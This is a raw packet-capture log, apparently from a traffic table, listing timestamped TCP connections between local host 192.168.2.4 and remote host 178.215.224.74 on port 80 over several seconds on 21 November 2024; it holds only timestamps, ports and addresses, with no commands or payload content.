                                        Nov 21, 2024 20:00:15.635415077 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.635458946 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.635509968 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.638360023 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.638427973 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.638475895 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.641385078 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.641424894 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.641460896 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.644439936 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.644504070 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.644537926 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.647420883 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.647478104 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.647625923 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.650578976 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.650665045 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.650715113 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.653496027 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.653547049 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.653598070 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.755353928 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.755449057 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.755511999 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.756879091 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.756941080 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.756984949 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.759073019 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.759177923 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.759224892 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.762144089 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.762267113 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.762320042 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.765038013 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.765156031 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.765196085 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.768126965 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.768208027 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.768244028 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.771169901 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.771306038 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.771339893 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.774127960 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.774281025 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.774365902 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.776640892 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.776742935 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.776774883 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.779198885 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.779274940 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.779316902 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.781719923 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.781851053 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.781886101 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.783919096 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.783988953 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.784023046 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.786060095 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.786124945 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.786163092 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.788203955 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.788326025 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.788372040 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.790350914 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.790519953 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.790565014 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.792507887 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.792608023 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.792644978 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.794677973 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.794765949 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.794800043 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.796791077 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.796894073 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.796931028 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.798986912 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.799113035 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.799146891 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.801120996 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.801275015 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.801316023 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.803308010 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.803369999 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.803411007 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.805470943 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.805493116 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.805531979 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.807580948 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.807704926 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.807739973 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.809725046 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.809855938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.809887886 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.811882019 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.811997890 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.812038898 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.814096928 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.814171076 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.814203024 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.816175938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.816281080 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.816318035 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.818365097 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.818492889 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.818535089 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.820593119 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.820622921 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.820658922 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.822689056 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.822786093 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.822815895 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.824968100 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.825010061 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.825048923 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.827008963 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.827088118 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.827127934 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.829133034 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.829227924 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.829265118 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.831274033 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.831391096 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.831443071 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.833405018 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.833501101 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.833537102 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.835644007 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.835807085 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.835853100 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.837798119 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.837898016 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.837934017 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.839910030 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.840015888 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.840065956 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.842091084 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.842242002 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.842293978 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.844228983 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.844475985 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.844516039 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.846385956 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.846476078 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.846513987 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.848603010 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.848665953 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.848702908 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.850683928 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.850814104 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.850850105 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.852895975 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.853037119 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.853077888 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.855005980 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.855150938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.855192900 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.857184887 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.857361078 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.857407093 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.859368086 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.895071983 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:16.015258074 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:16.015321016 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:16.365856886 CET4983180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:16.491724968 CET8049831178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:16.491821051 CET4983180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:16.492132902 CET4983180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:16.611645937 CET8049831178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:17.796339035 CET8049831178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:17.834397078 CET4983180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:17.961369038 CET8049831178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:17.961441994 CET4983180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:18.043637991 CET4983580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:18.163413048 CET8049835178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:18.163496971 CET4983580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:18.164597034 CET4983580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:18.284626961 CET8049835178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:19.486316919 CET8049835178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:19.496396065 CET4983580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:19.617598057 CET8049835178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:19.617651939 CET4983580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:20.010140896 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:20.263864040 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:20.264126062 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:20.264441967 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:20.386418104 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784399986 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784445047 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784476042 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784490108 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.784501076 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784533978 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784537077 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.784562111 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784573078 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784579992 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784584999 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784588099 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.784616947 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.784655094 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.906269073 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.910492897 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.910579920 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.976555109 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.976577044 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.976627111 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.980618000 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.980705023 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.980751991 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.989151955 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.989202976 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.989248037 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:21.997651100 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.997750998 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:21.997792006 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.006366968 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.006382942 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.006436110 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.014909029 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.014929056 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.014967918 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.023299932 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.023405075 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.023458004 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.031845093 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.031955957 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.032002926 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.040338993 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.040380955 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.040422916 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.048906088 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.049000978 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.049043894 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.057440042 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.057495117 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.057538986 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.168272018 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.168360949 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.168476105 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.172447920 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.174029112 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.174086094 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.174112082 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.182595015 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.182676077 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.182730913 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.191150904 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.191224098 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.191287994 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.196002007 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.196059942 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.196079016 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.200664997 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.200736046 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.200812101 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.205339909 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.205388069 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.205395937 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.210021019 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.210040092 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.210078001 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.214657068 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.214698076 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.214716911 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.219532013 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.219593048 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.219650984 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.223997116 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.224046946 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.224066973 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.228656054 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.228703022 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.228770971 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.233390093 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.233467102 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.233464956 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.237991095 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.238059998 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.238095045 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.242691994 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.242754936 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.242820978 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.247400999 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.247450113 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.247462034 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.252149105 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.252207994 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.252232075 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.256743908 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.256808043 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.256839991 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.261555910 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.261629105 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.261630058 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.288026094 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.288083076 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.288115025 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.340704918 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.360744953 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.360768080 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.360863924 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.362040043 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.362217903 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.362354040 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.366548061 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.366672993 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.366723061 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.371120930 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.371206999 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.371248960 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.375588894 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.375722885 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.375771999 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.379913092 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.380064011 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.380110025 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.384092093 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.384253979 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.384325027 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.388076067 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.388210058 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.388257027 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.391998053 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.392165899 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.392205954 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.395700932 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.395797968 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.395837069 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.399476051 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.399648905 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.399688005 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.403255939 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.403419971 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.403469086 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.407027960 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.407215118 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.407262087 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.412126064 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.412256956 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.412297964 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.414555073 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.414659023 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.414705038 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.418224096 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.418332100 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.418375969 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.420804977 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.420896053 CET8049838178.215.224.74192.168.2.4
